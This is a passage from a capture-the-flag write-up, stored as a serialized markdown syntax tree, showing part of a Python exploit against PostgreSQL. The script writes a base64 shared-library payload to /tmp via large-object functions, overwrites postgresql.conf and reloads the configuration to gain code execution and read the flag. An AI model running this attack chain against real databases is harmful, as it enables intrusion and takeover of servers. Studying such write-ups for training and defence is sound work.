",{"type":34,"tag":315,"props":5901,"children":5902},{"style":338},[5903],{"type":39,"value":803},{"type":34,"tag":315,"props":5905,"children":5906},{"style":701},[5907],{"type":39,"value":5737},{"type":34,"tag":315,"props":5909,"children":5910},{"style":338},[5911],{"type":39,"value":351},{"type":34,"tag":315,"props":5913,"children":5914},{"style":354},[5915],{"type":39,"value":357},{"type":34,"tag":315,"props":5917,"children":5918},{"style":360},[5919],{"type":39,"value":5920},"payload.b64",{"type":34,"tag":315,"props":5922,"children":5923},{"style":354},[5924],{"type":39,"value":357},{"type":34,"tag":315,"props":5926,"children":5927},{"style":338},[5928],{"type":39,"value":3226},{"type":34,"tag":315,"props":5930,"children":5931},{"class":317,"line":4664},[5932,5937,5941,5945],{"type":34,"tag":315,"props":5933,"children":5934},{"style":701},[5935],{"type":39,"value":5936},"    current_id ",{"type":34,"tag":315,"props":5938,"children":5939},{"style":338},[5940],{"type":39,"value":803},{"type":34,"tag":315,"props":5942,"children":5943},{"style":701},[5944],{"type":39,"value":5271},{"type":34,"tag":315,"props":5946,"children":5947},{"style":338},[5948],{"type":39,"value":2686},{"type":34,"tag":315,"props":5950,"children":5951},{"class":317,"line":4672},[5952],{"type":34,"tag":315,"props":5953,"children":5954},{"style":701},[5955],{"type":39,"value":5544},{"type":34,"tag":315,"props":5957,"children":5958},{"class":317,"line":4736},[5959,5964,5968,5973,5978,5982,5987,5991,5996,6000,6005,6009,6014],{"type":34,"tag":315,"props":5960,"children":5961},{"style":701},[5962],{"type":39,"value":5963},"    exec_payload",{"type":34,"tag":315,"props":5965,"children":5966},{"style":338},[5967],{"type":39,"value":351},{"type":34,"tag":315,"props":5969,"children":5970},{"style":384},[5971],{"type":39,"value":5972},"f",{"type":34,"tag":315,"props":5974,"children":5975},{"style":360},[5976],{"type":39,"value":5977},"\"SELECT lo_from_bytea(",{"type":34,"tag":315,"props":5979,"children":5980},{"style":3541},[5981],{"type":39,"value":2066},{"type":34,"tag":315,"props":5983,"children":5984},{"style":701},[5985],{"type":39,"value":5986},"current_id",{"type":34,"tag":315,"props":5988,"children":5989},{"style":3541},[5990],{"type":39,"value":525},{"type":34,"tag":315,"props":5992,"children":5993},{"style":360},[5994],{"type":39,"value":5995},", decode('",{"type":34,"tag":315,"props":5997,"children":5998},{"style":3541},[5999],{"type":39,"value":2066},{"type":34,"tag":315,"props":6001,"children":6002},{"style":701},[6003],{"type":39,"value":6004},"payload",{"type":34,"tag":315,"props":6006,"children":6007},{"style":3541},[6008],{"type":39,"value":525},{"type":34,"tag":315,"props":6010,"children":6011},{"style":360},[6012],{"type":39,"value":6013},"', 'base64'))\"",{"type":34,"tag":315,"props":6015,"children":6016},{"style":338},[6017],{"type":39,"value":3226},{"type":34,"tag":315,"props":6019,"children":6020},{"class":317,"line":4781},[6021,6025,6029,6033,6038,6042,6046,6050,6055],{"type":34,"tag":315,"props":6022,"children":6023},{"style":701},[6024],{"type":39,"value":5963},{"type":34,"tag":315,"props":6026,"children":6027},{"style":338},[6028],{"type":39,"value":351},{"type":34,"tag":315,"props":6030,"children":6031},{"style":384},[6032],{"type":39,"value":5972},{"type":34,"tag":315,"props":6034,"children":6035},{"style":360},[6036],{"type":39,"value":6037},"\"SELECT lo_export(",{"type":34,"tag":315,"props":6039,"children":6040},{"style":3541},[6041],{"type":39,"value":2066},{"type":34,"tag":315,"props":6043,"children":6044},{"style":701},[6045],{"type":39,"value":5986},{"type":34,"tag":315,"props":6047,"children":6048},{"style":3541},[6049],{"type":39,"value":525},{"type":34,"tag":315,"props":6051,"children":6052},{"style":360},[6053],{"type":39,"value":6054},", '/tmp/payload.so')\"",{"type":34,"tag":315,"props":6056,"children":6057},{"style":338},[6058],{"type":39,"value":3226},{"type":34,"tag":315,"props":6060,"children":6062},{"class":317,"line":6061},38,[6063],{"type":34,"tag":315,"props":6064,"children":6065},{"emptyLinePlaceholder":545},[6066],{"type":39,"value":548},{"type":34,"tag":315,"props":6068,"children":6070},{"class":317,"line":6069},39,[6071],{"type":34,"tag":315,"props":6072,"children":6073},{"style":322},[6074],{"type":39,"value":6075},"    # upload conf\n",{"type":34,"tag":315,"props":6077,"children":6079},{"class":317,"line":6078},40,[6080,6085,6089,6093,6097,6101,6105,6109],{"type":34,"tag":315,"props":6081,"children":6082},{"style":701},[6083],{"type":39,"value":6084},"    conf ",{"type":34,"tag":315,"props":6086,"children":6087},{"style":338},[6088],{"type":39,"value":803},{"type":34,"tag":315,"props":6090,"children":6091},{"style":701},[6092],{"type":39,"value":5563},{"type":34,"tag":315,"props":6094,"children":6095},{"style":338},[6096],{"type":39,"value":351},{"type":34,"tag":315,"props":6098,"children":6099},{"style":354},[6100],{"type":39,"value":357},{"type":34,"tag":315,"props":6102,"children":6103},{"style":360},[6104],{"type":39,"value":3784},{"type":34,"tag":315,"props":6106,"children":6107},{"style":354},[6108],{"type":39,"value":357},{"type":34,"tag":315,"props":6110,"children":6111},{"style":338},[6112],{"type":39,"value":3226},{"type":34,"tag":315,"props":6114,"children":6116},{"class":317,"line":6115},41,[6117,6121,6125,6129],{"type":34,"tag":315,"props":6118,"children":6119},{"style":701},[6120],{"type":39,"value":5936},{"type":34,"tag":315,"props":6122,"children":6123},{"style":338},[6124],{"type":39,"value":803},{"type":34,"tag":315,"props":6126,"children":6127},{"style":701},[6128],{"type":39,"value":5271},{"type":34,"tag":315,"props":6130,"children":6131},{"style":338},[6132],{"type":39,"value":2686},{"type":34,"tag":315,"props":6134,"children":6136},{"class":317,"line":6135},42,[6137],{"type":34,"tag":315,"props":6138,"children":6139},{"style":701},[6140],{"type":39,"value":5544},{"type":34,"tag":315,"props":6142,"children":6144},{"class":317,"line":6143},43,[6145,6149,6153,6157,6161,6165,6169,6173,6177,6181,6185,6189,6193],{"type":34,"tag":315,"props":6146,"children":6147},{"style":701},[6148],{"type":39,"value":5963},{"type":34,"tag":315,"props":6150,"children":6151},{"style":338},[6152],{"type":39,"value":351},{"type":34,"tag":315,"props":6154,"children":6155},{"style":384},[6156],{"type":39,"value":5972},{"type":34,"tag":315,"props":6158,"children":6159},{"style":360},[6160],{"type":39,"value":5977},{"type":34,"tag":315,"props":6162,"children":6163},{"style":3541},[6164],{"type":39,"value":2066},{"type":34,"tag":315,"props":6166,"children":6167},{"style":701},[6168],{"type":39,"value":5986},{"type":34,"tag":315,"props":6170,"children":6171},{"style":3541},[6172],{"type":39,"value":525},{"type":34,"tag":315,"props":6174,"children":6175},{"style":360},[6176],{"type":39,"value":5995},{"type":34,"tag":315,"props":6178,"children":6179},{"style":3541},[6180],{"type":39,"value":2066},{"type":34,"tag":315,"props":6182,"children":6183},{"style":701},[6184],{"type":39,"value":3784},{"type":34,"tag":315,"props":6186,"children":6187},{"style":3541},[6188],{"type":39,"value":525},{"type":34,"tag":315,"props":6190,"children":6191},{"style":360},[6192],{"type":39,"value":6013},{"type":34,"tag":315,"props":6194,"children":6195},{"style":338},[6196],{"type":39,"value":3226},{"type":34,"tag":315,"props":6198,"children":6200},{"class":317,"line":6199},44,[6201,6205,6209,6213,6217,6221,6225,6229,6234],{"type":34,"tag":315,"props":6202,"children":6203},{"style":701},[6204],{"type":39,"value":5963},{"type":34,"tag":315,"props":6206,"children":6207},{"style":338},[6208],{"type":39,"value":351},{"type":34,"tag":315,"props":6210,"children":6211},{"style":384},[6212],{"type":39,"value":5972},{"type":34,"tag":315,"props":6214,"children":6215},{"style":360},[6216],{"type":39,"value":6037},{"type":34,"tag":315,"props":6218,"children":6219},{"style":3541},[6220],{"type":39,"value":2066},{"type":34,"tag":315,"props":6222,"children":6223},{"style":701},[6224],{"type":39,"value":5986},{"type":34,"tag":315,"props":6226,"children":6227},{"style":3541},[6228],{"type":39,"value":525},{"type":34,"tag":315,"props":6230,"children":6231},{"style":360},[6232],{"type":39,"value":6233},", '/var/lib/postgresql/data/postgresql.conf')\"",{"type":34,"tag":315,"props":6235,"children":6236},{"style":338},[6237],{"type":39,"value":3226},{"type":34,"tag":315,"props":6239,"children":6241},{"class":317,"line":6240},45,[6242],{"type":34,"tag":315,"props":6243,"children":6244},{"emptyLinePlaceholder":545},[6245],{"type":39,"value":548},{"type":34,"tag":315,"props":6247,"children":6249},{"class":317,"line":6248},46,[6250],{"type":34,"tag":315,"props":6251,"children":6252},{"style":322},[6253],{"type":39,"value":6254},"    # reload conf\n",{"type":34,"tag":315,"props":6256,"children":6258},{"class":317,"line":6257},47,[6259,6263,6267,6271,6276],{"type":34,"tag":315,"props":6260,"children":6261},{"style":701},[6262],{"type":39,"value":5963},{"type":34,"tag":315,"props":6264,"children":6265},{"style":338},[6266],{"type":39,"value":351},{"type":34,"tag":315,"props":6268,"children":6269},{"style":384},[6270],{"type":39,"value":5972},{"type":34,"tag":315,"props":6272,"children":6273},{"style":360},[6274],{"type":39,"value":6275},"\"SELECT pg_reload_conf()\"",{"type":34,"tag":315,"props":6277,"children":6278},{"style":338},[6279],{"type":39,"value":3226},{"type":34,"tag":315,"props":6281,"children":6283},{"class":317,"line":6282},48,[6284,6288,6292,6296,6300],{"type":34,"tag":315,"props":6285,"children":6286},{"style":701},[6287],{"type":39,"value":5963},{"type":34,"tag":315,"props":6289,"children":6290},{"style":338},[6291],{"type":39,"value":351},{"type":34,"tag":315,"props":6293,"children":6294},{"style":384},[6295],{"type":39,"value":5972},{"type":34,"tag":315,"props":6297,"children":6298},{"style":360},[6299],{"type":39,"value":6275},{"type":34,"tag":315,"props":6301,"children":6302},{"style":338},[6303],{"type":39,"value":3226},{"type":34,"tag":315,"props":6305,"children":6307},{"class":317,"line":6306},49,[6308,6312,6316,6320,6324],{"type":34,"tag":315,"props":6309,"children":6310},{"style":701},[6311],{"type":39,"value":5963},{"type":34,"tag":315,"props":6313,"children":6314},{"style":338},[6315],{"type":39,"value":351},{"type":34,"tag":315,"props":6317,"children":6318},{"style":384},[6319],{"type":39,"value":5972},{"type":34,"tag":315,"props":6321,"children":6322},{"style":360},[6323],{"type":39,"value":6275},{"type":34,"tag":315,"props":6325,"children":6326},{"style":338},[6327],{"type":39,"value":3226},{"type":34,"tag":48,"props":6329,"children":6330},{},[6331,6333,6338],{"type":39,"value":6332},"Once the configuration is reloaded, we can retrieve the flag using the ",{"type":34,"tag":59,"props":6334,"children":6336},{"className":6335},[],[6337],{"type":39,"value":64},{"type":39,"value":6339}," binary",{"type":34,"tag":73,"props":6341,"children":6343},{"imgSrc":6342,":width":3448},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743113795/writeups/aurors-archive/read_flag.webp",[],{"type":34,"tag":6345,"props":6346,"children":6347},"style",{},[6348],{"type":39,"value":6349},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":328,"depth":318,"links":6351},[6352,6353,6354,6355],{"id":43,"depth":328,"text":46},{"id":268,"depth":328,"text":271},{"id":721,"depth":328,"text":724},{"id":3452,"depth":328,"text":3455},"markdown","content:writeups:aurors-archive.md","content","writeups/aurors-archive.md","writeups/aurors-archive","md",1749027224490]